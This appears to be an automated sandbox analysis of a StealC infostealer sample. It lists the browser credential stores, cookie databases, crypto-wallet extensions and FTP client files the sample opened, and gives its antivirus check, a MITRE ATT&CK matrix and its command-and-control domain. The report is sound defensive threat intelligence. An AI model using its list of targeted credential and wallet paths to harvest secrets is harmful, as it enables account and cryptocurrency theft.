            Source: C:\Users\user\Desktop\k6A01XaeEn.exe | WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

            Stealing of Sensitive Information

            Source: Yara matchFile source: Process Memory Space: k6A01XaeEn.exe PID: 7736, type: MEMORYSTR
            Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
            Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.js
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifd
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.db
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqlite
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhi
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoa
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbm
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffne
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklk
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdma
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdil
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnkno
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolb
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgik
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkp
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\FTPGetter
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\FTPInfo
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\FTPbox
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\FTPRush
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\ProgramData\SiteDesigner\3D-FTP
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Binance
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; File opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\LSBIHQFDVT
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\UOOJJOZIRH
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\LTKMYBSEYZ
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\QNCYCDFIJJ
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\WUTJSCBCFX
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\YPSIACHYXW
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\ZBEDCJPBEY
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: C:\Users\user\Documents\NIKHQAIQAU
Source: C:\Users\user\Desktop\k6A01XaeEn.exe; Directory queried: number of queries: 1001
Source: Yara match; File source: 00000000.00000003.1940934471.0000000000B4A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000003.1940699958.0000000000B48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: k6A01XaeEn.exe PID: 7736, type: MEMORYSTR

            Remote Access Functionality

Source: Yara match; File source: Process Memory Space: k6A01XaeEn.exe PID: 7736, type: MEMORYSTR
Source: Yara match; File source: sslproxydump.pcap, type: PCAP
Source: Yara match; File source: decrypted.memstr, type: MEMORYSTR
MITRE ATT&CK Matrix (a number in parentheses is the count of matched signatures for that technique; cells without a number are unmatched matrix entries)

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | Windows Management Instrumentation (2) | DLL Side-Loading (1) | Process Injection (1) | Virtualization/Sandbox Evasion (11) | OS Credential Dumping (2) | Query Registry (1) | Remote Services | Data from Local System (31) | Encrypted Channel (1) | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | PowerShell (1) | Boot or Logon Initialization Scripts | DLL Side-Loading (1) | Process Injection (1) | LSASS Memory | Security Software Discovery (121) | Remote Desktop Protocol | Data from Removable Media | Non-Application Layer Protocol (2) | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | Deobfuscate/Decode Files or Information (1) | Security Account Manager | Virtualization/Sandbox Evasion (11) | SMB/Windows Admin Shares | Data from Network Shared Drive | Application Layer Protocol (113) | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | Obfuscated Files or Information (2) | NTDS | Process Discovery (1) | Distributed Component Object Model | Input Capture | Protocol Impersonation | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | Software Packing (22) | LSA Secrets | File and Directory Discovery (2) | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | DLL Side-Loading (1) | Cached Domain Credentials | System Information Discovery (22) | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
Source | Detection | Scanner | Label | Link
k6A01XaeEn.exe | 74% | ReversingLabs | Win32.Trojan.StealC
k6A01XaeEn.exe | 100% | Joe Sandbox ML
No Antivirus matches
Name | IP | Active | Malicious | Antivirus Detection | Reputation
discokeyus.lat | 104.21.21.99 | true | true | | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
104.21.21.99 | discokeyus.lat | United States | 13335 | CLOUDFLARENET US | true
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1577869
Start date and time: 2024-12-18 20:53:12 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 5m 31s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed: 8
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: k6A01XaeEn.exe (renamed because the original name is a hash value)
Original Sample Name: fd5fe344fef63284ed51951698535fca.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@2/5@1/1
EGA Information: Failed
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded IPs from analysis (whitelisted): 20.42.65.92, 172.202.163.200, 20.190.147.11, 13.107.246.63
• Excluded domains from analysis (whitelisted): onedsblobprdeus17.eastus.cloudapp.azure.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target k6A01XaeEn.exe, PID 7736, because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtQueryDirectoryFile calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: k6A01XaeEn.exe
Time | Type | Description
14:54:16 | API Interceptor | 8x Sleep call for process: k6A01XaeEn.exe modified
14:55:10 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
                                                                                              Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                              File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                              Category:dropped
                                                                                              Size (bytes):65536
                                                                                              Entropy (8bit):1.0259059851514825
                                                                                              Encrypted:false
                                                                                              SSDEEP:96:2yz457shQsXhrV72fLQXIDcQMc67cE2cw3o+HbHg/8BRTf3Oy1E45WAU6NCUtW2L:9zhhQS0C/cFju3mezuiFRZ24IO8H
                                                                                              MD5:80C0C0E66EA3516DD1F188475CC22799
                                                                                              SHA1:BAB79CE05D042165B597E24C521650BDFC804ACB
                                                                                              SHA-256:09F227EA430D9A896152D5E521D1475B798D286ABCC145C60F74963B9500990C
                                                                                              SHA-512:C75D37694C64A6CF9B523D8D39E22796A6715238E41060CB03740CBC53915F5B894FC56EB4F09B3800023B960D45334A30AF8B8D512ECA4FEC7D40A6CE0A5FFB
